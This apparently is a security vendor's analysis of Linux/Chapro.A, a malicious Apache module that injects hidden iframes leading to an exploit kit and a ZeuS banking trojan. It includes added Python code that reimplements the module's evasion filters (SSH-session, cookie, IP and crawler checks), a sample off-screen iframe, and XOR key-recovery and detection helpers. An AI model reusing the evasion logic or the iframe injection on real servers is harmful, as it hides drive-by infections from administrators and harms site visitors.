Malicious Apache module used for content injection: Linux/Chapro.A
[Update: David Harley has published a blog post here with additional information about this malware.]
More than half of all web servers on the Internet use Apache, so when we discovered a malicious Apache module in the wild last month, being used to inject malicious content into web pages served by compromised web servers, we were understandably concerned. Our concern deepened when we discovered that this malware was being used in a scheme to steal banking credentials.
At first, we wondered if this code might be related to the Linux/Snasko.A rootkit reported to the Full-Disclosure mailing list and later analyzed by CrowdStrike and Kaspersky, but it turns out this is a totally different beast.
Although the module can serve any type of content, in this specific case the final payload, delivered through an iframe injection, was the installation of a variant of Win32/Zbot, which is commonly used to steal banking information from infected systems.
We also found that this module has a couple of interesting capabilities designed to reduce the chances of being spotted by system administrators. In addition to analyzing the malicious Apache module, we were able to examine the malicious content it was serving.
In this analysis, we will present the characteristics of Linux/Chapro.A. We will also give an overview of the exploit kit used to install the malware, and of the final Win32/Zbot payload.
The Linux/Chapro.A malicious Apache module is an x64 Linux binary. This malware makes use of only one obfuscation technique: an XOR loop with a 12-byte key is used to encode most of its strings.
The module has several capabilities to evade detection by system administrators. Before serving malicious content to a visitor, it performs multiple checks.
First, Linux/Chapro.A checks the web browser's user agent for known bots as well as web browsers that are not likely to be vulnerable to the exploits used to infect the target system. If the web browser visiting the page has a user agent string that contains keywords known to be used by web crawlers, it will not be served the malicious content. The following figure shows some of the keywords used by the bot.
Linux/Chapro.A also checks all active SSH sessions on the Linux system on which it is running to determine the IP addresses used by them. If a visitor browses the page from any of the IPs involved in an SSH connection, it will not be served the malicious content. This helps hide the malicious content from system administrators, web developers and others who might be working on the web server.
Before injecting the malicious iframe into the web content sent by the server, Linux/Chapro.A sets a cookie in the visiting web browser. Malicious content will not be served if the visiting browser already has that cookie set. This helps ensure that visitors will not receive malicious content over and over again, making it more difficult to determine how a system was infected.
Finally, Linux/Chapro.A maintains a list of IP addresses that have been served malicious content. If a user visits an infected website twice from the same IP address, they will only receive the malicious content once. This provides a second, additional method of making the path of infection more difficult to determine. For anyone trying to reproduce the injection, the practical consequence is that a single fetch from an administrator's workstation proves nothing: the request must come from an IP address with no SSH session to the server, use a browser-like user agent, carry no cookies, and originate from an address that has not been served before.
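The following Python simulation of the four filtering checks, in the order described above, is an added example and not code from Linux/Chapro.A or from ESET. The crawler keyword list, the list of browsers treated as not worth exploiting, the cookie name and the use of /proc/net/tcp to enumerate SSH sessions are all assumptions made for illustration; the analysis does not say how the module performs the SSH check.

```python
"""Added example: a simulation of the visitor-filtering order described above.
Not code from Linux/Chapro.A or from ESET; the crawler keyword list, the cookie
name, the /proc/net/tcp parsing and the treatment of non-targeted browsers are
all assumptions made for illustration."""
from dataclasses import dataclass, field

# Assumed keyword lists; the real ones are only shown in the article's figure.
CRAWLER_KEYWORDS = ("googlebot", "bingbot", "yandex", "baiduspider", "curl", "wget")
NOT_TARGETED_KEYWORDS = ("lynx", "w3m")
MARKER_COOKIE = "_visited"  # hypothetical name; the real cookie name is not given


@dataclass
class Request:
    user_agent: str
    remote_ip: str
    cookies: dict


@dataclass
class ModuleState:
    ssh_peer_ips: set
    served_ips: set = field(default_factory=set)


def ssh_peer_ips_from_proc_net_tcp(text: str) -> set:
    """Collect remote IPs of ESTABLISHED connections to local port 22 from
    /proc/net/tcp-formatted text. One plausible way to enumerate SSH sessions
    on Linux (assumption: the analysis does not say how the module does it)."""
    peers = set()
    for line in text.splitlines()[1:]:          # skip the header row
        parts = line.split()
        if len(parts) < 4:
            continue
        local, remote, state = parts[1], parts[2], parts[3]
        if int(local.split(":")[1], 16) != 22 or state != "01":  # 01 = ESTABLISHED
            continue
        rhex = remote.split(":")[0]              # IPv4 as little-endian hex
        octets = [int(rhex[i:i + 2], 16) for i in (6, 4, 2, 0)]
        peers.add(".".join(str(o) for o in octets))
    return peers


def should_inject(req: Request, state: ModuleState):
    """Apply the checks in the order the text lists them and return
    (decision, reason). The cookie is set and the IP recorded only when the
    iframe is actually served."""
    ua = req.user_agent.lower()
    if any(k in ua for k in CRAWLER_KEYWORDS):
        return False, "crawler user agent"
    if any(k in ua for k in NOT_TARGETED_KEYWORDS):
        return False, "browser not targeted"
    if req.remote_ip in state.ssh_peer_ips:
        return False, "ip has active ssh session"
    if MARKER_COOKIE in req.cookies:
        return False, "marker cookie present"
    if req.remote_ip in state.served_ips:
        return False, "ip already served"
    state.served_ips.add(req.remote_ip)
    req.cookies[MARKER_COOKIE] = "1"             # Set-Cookie in the response
    return True, "serve iframe"


# Constructed /proc/net/tcp excerpt: one SSH session from 192.168.1.50 and one
# unrelated HTTP connection on port 80.
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1 1 0 100 0 0 10 0
   1: 0A01A8C0:0016 3201A8C0:D2F8 01 00000000:00000000 00:00000000 00000000     0        0 2 1 0 20 4 30 10 -1
   2: 0A01A8C0:0050 170CCE1F:C3A1 01 00000000:00000000 00:00000000 00000000     0        0 3 1 0 20 4 30 10 -1
"""


def demo():
    """Walk a few constructed visitors through the filter; returns the decisions."""
    state = ModuleState(ssh_peer_ips=ssh_peer_ips_from_proc_net_tcp(SAMPLE_PROC_NET_TCP))
    browser = "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
    visits = [
        Request("Googlebot/2.1 (+http://www.google.com/bot.html)", "203.0.113.7", {}),
        Request(browser, "192.168.1.50", {}),   # the admin, logged in over SSH
        Request(browser, "203.0.113.7", {}),    # first visit from a fresh IP
        Request(browser, "203.0.113.7", {}),    # same IP, new browser profile
    ]
    return [should_inject(v, state) for v in visits]


if __name__ == "__main__":
    for decision, reason in demo():
        print(decision, reason)
```

Only the third constructed visitor is served: the crawler fails the user-agent check, the administrator's address matches an SSH session, and the fourth request is refused because its IP has already been served even though it carries no cookie.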
The main purpose of Linux/Chapro.A is to inject iframes into web pages served by the Apache web server to which it is attached. To do so, the malware sends an HTTP POST request to its command and control server every 10 minutes. The following figure shows one such HTTP POST request.
At the time of our analysis, the malicious command and control server was being hosted in Germany. It has recently gone offline.
The request is simple; it only includes the version of the malware and the operating system it is running on. The command and control server responds to the query with the iframe to be injected by the malicious Apache module. The iframe is encoded using base64 and XOR. If the visitor does not fall into any of the blacklists detailed in the previous section, it is served the iframe downloaded from the command and control server.
The figure below shows the HTML code for an iframe sent by Linux/Chapro.A. The iframe is positioned outside of the usual browser display area in order to avoid being seen by the user.
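The Python block below is an added example, not code from the malware or from ESET, covering the two encodings mentioned in this analysis: the repeating-key XOR applied to the module's strings (12-byte key) and the base64-plus-XOR layering on the C2 reply. It also shows why a repeating XOR key offers no real protection, by recovering the key from ciphertext with a known twelve-byte prefix, and adds a triage check for iframes styled to sit outside the display area. The key, the sample iframe and URL, the order of the base64 and XOR layers, and the hiding styles looked for are all assumptions for illustration.

```python
"""Added example: the two encodings the analysis mentions, a repeating-key XOR
(Chapro.A uses a 12-byte key for its strings) layered under base64 for the C2
reply, plus a known-plaintext key recovery and a triage check for off-screen
iframes. Not code from the malware or from ESET. The key, the sample iframe,
the base64-then-XOR layering order and the hiding styles checked for are
assumptions for illustration."""
import base64
import re


def xor_repeating(data: bytes, key: bytes) -> bytes:
    """XOR each byte with the key byte at its index modulo the key length.
    XOR is its own inverse, so the same call encodes and decodes."""
    if not key:
        raise ValueError("empty key")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def encode_c2_response(markup: str, key: bytes) -> str:
    """XOR the markup, then base64 it (assumed order of the layers)."""
    return base64.b64encode(xor_repeating(markup.encode(), key)).decode("ascii")


def decode_c2_response(blob: str, key: bytes) -> str:
    """Reverse of encode_c2_response: base64-decode, then XOR with the key."""
    return xor_repeating(base64.b64decode(blob), key).decode("utf-8", "replace")


def recover_key(ciphertext: bytes, known_plaintext: bytes, key_len: int = 12) -> bytes:
    """Known-plaintext attack on a repeating key: ciphertext XOR plaintext over
    one full key period is the key itself. Twelve bytes of known prefix are
    enough for a 12-byte key, and '<iframe src=' is exactly twelve bytes."""
    if len(known_plaintext) < key_len or len(ciphertext) < key_len:
        raise ValueError("need at least key_len bytes of ciphertext and plaintext")
    return bytes(c ^ p for c, p in zip(ciphertext[:key_len], known_plaintext[:key_len]))


IFRAME_TAG_RE = re.compile(r"<iframe\b[^>]*>", re.I)
STYLE_RE = re.compile(r"""style\s*=\s*["']([^"']*)["']""", re.I)


def offscreen_iframes(html: str) -> list:
    """Return iframe tags whose inline style pushes them off-screen, collapses
    them to 0/1 px, or hides them outright. A cheap first pass when triaging
    served HTML for injected content (heuristic; styles set via CSS classes
    or script are not seen)."""
    hits = []
    for tag in IFRAME_TAG_RE.findall(html):
        m = STYLE_RE.search(tag)
        style = m.group(1).lower().replace(" ", "") if m else ""
        if (re.search(r"(?:^|;)(?:top|left):-\d+", style)
                or re.search(r"(?:^|;)(?:width|height):0*[01]px", style)
                or "visibility:hidden" in style
                or "display:none" in style):
            hits.append(tag)
    return hits


# Constructed sample: a 12-byte key and an iframe of the hidden kind described
# in the text. The real key and landing-page URL are not reproduced here.
SAMPLE_KEY = bytes.fromhex("3c115e7f029ac445680bd721")
SAMPLE_IFRAME = ('<iframe src="http://198.51.100.23/in.php" '
                 'style="position:absolute; top:-1000px; left:-1000px; '
                 'width:1px; height:1px"></iframe>')


def demo() -> dict:
    """Round-trip the sample iframe through the C2 encoding, recover the key
    from the ciphertext alone, and flag the iframe in a page."""
    blob = encode_c2_response(SAMPLE_IFRAME, SAMPLE_KEY)
    raw = base64.b64decode(blob)
    page = "<html><body><p>hello</p>" + SAMPLE_IFRAME + "<iframe src='/a'></iframe></body></html>"
    return {
        "blob": blob,
        "decoded": decode_c2_response(blob, SAMPLE_KEY),
        "recovered_key": recover_key(raw, b"<iframe src="),
        "flagged": offscreen_iframes(page),
    }


if __name__ == "__main__":
    out = demo()
    print(out["blob"])
    print(out["recovered_key"].hex(), out["flagged"])
```

The same key-recovery idea applies to the strings inside the binary: any string whose first twelve bytes can be guessed (a common HTTP header name followed by its separator, for instance) gives up the key, after which every other obfuscated string decodes with one XOR pass.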
Based on our research and on descriptions from this article, we are confident that the iframe injected by Linux/Chapro.A points to a "Sweet Orange" exploit kit landing page. At the time of our analysis, the exploit kit was being hosted in Lithuania. The kit tries to exploit the following vulnerabilities found in modern web browsers and plugins:
- CVE-2012-5076: Java JAX-WS Class Handling
- CVE-2012-4681: Java getField Method Class Invocation Privilege Escalation
- CVE-2006-0003: Internet Explorer MDAC
- CVE-2010-0188: Adobe Reader LibTiff Integer Overflow
If the exploit kit succeeds in exploiting one of the vulnerabilities it has exploits for, the final payload is executed.
The final purpose of the attack we investigated is to install a variant of Win32/Zbot, also known as ZeuS, which has been widely used for years to steal banking-related information. In this case, the Win32/Zbot variant targets European and Russian banking institutions. The screenshot below shows the form used by a bank to give customers online access to account information.
Apparently this bank is aware that it has been targeted by criminals attempting to obtain customers' PIN codes and CVC/CVV codes. Indeed, a specific warning is shown on the customer login form. However, when the login page is visited from a compromised host, this warning is removed by the malware, as we can see below.
Once the user has logged into their account, the malware injects a pop-up asking for the CVV code of their card, which is exactly the behavior described in the warning on the original login form. The malware then tries to send the user's credentials, along with the CVV, to the botnet operator.
The Linux/Chapro.A attack has not been publicly documented in the past. Our telemetry systems did not report other installations of this malicious Apache module in the wild. While the intent of injecting iframes into served web pages is the same as that of the rootkit analyzed by CrowdStrike and Kaspersky, we confirm this is not the same malware family. On the other hand, this malware has many similarities to something discussed on Russian underground forums, as exposed by Dancho Danchev.
While we have not witnessed any other installations of Linux/Chapro.A in the wild, we have observed thousands of users accessing the Sweet Orange exploit kit before we blocked access to this server in our products. ESET blocked the exploit attempts through generic detection, even before additional protection was added with URL blocking.
The attack described in the present analysis shows the increasing complexity of malware attacks. This complicated case spans three different countries, targeting users from a fourth one, making it very hard for law enforcement agencies to investigate and mitigate. It is not clear at this point in time whether the same group of people is behind the whole operation, or whether multiple gangs collaborated, perhaps with one driving traffic to the exploit kit and selling the infected computers to another gang operating a botnet based on Win32/Zbot.
We would like to thank the following researchers for their contribution to this research: Jean-Ian Boutin, François Chagnon, Sébastien Duquette, Aleksander Matrosov.
The following listing provides the MD5 hashes for the files involved in our research:
Security Intelligence Program Manager